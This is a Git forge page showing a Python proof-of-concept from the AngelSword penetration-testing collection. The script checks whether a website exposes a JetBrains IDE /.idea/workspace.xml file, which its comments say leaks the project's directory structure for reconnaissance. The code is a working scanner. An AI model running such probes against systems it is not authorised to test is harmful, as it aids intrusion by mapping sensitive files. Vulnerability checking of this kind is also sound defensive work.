Lucifer1993/AngelSword
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
master
AngelSword/information/jetbrains_ide_workspace_disclosure.py

38 lines
1.6 KiB
Python
Raw Permalink Normal View History

add jetbrains poc
2017-07-18 19:28:02 +08:00
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: JetBrains IDE workspace.xml文件泄露
referer: http://www.ab156.com/vul/view/vulid/3631.html
author: Lucifer
description: 网站存在JetBrains系列IDE的工作区文件可以泄露整个工程的目录结构信息通过下载workspace.xml可直接获取整个工程的目录结构发现敏感文件为渗透中收集信息发现漏洞提供了极大的便利
'''
import sys
import requests
import warnings
from termcolor import cprint
class jetbrains_ide_workspace_disclosure_BaseVerify:
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "/.idea/workspace.xml"
vulnurl = self.url + payload
try:
req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
if r"<?xml version=" in req.text and r"project version" in req.text and req.status_code==200:
cprint("[+]存在JetBrains IDE workspace.xml文件泄露漏洞...(中危)\tpayload: "+vulnurl, "yellow")
update
2018-10-31 11:40:59 +08:00
else:
cprint("[-]不存在jetbrains_ide_workspace_disclosure漏洞", "white", "on_grey")
add jetbrains poc
2017-07-18 19:28:02 +08:00
except:
update
2018-10-31 11:40:59 +08:00
cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
add jetbrains poc
2017-07-18 19:28:02 +08:00
if __name__ == "__main__":
warnings.filterwarnings("ignore")
testVuln = jetbrains_ide_workspace_disclosure_BaseVerify(sys.argv[1])
testVuln.run()
Reference in New Issue Copy Permalink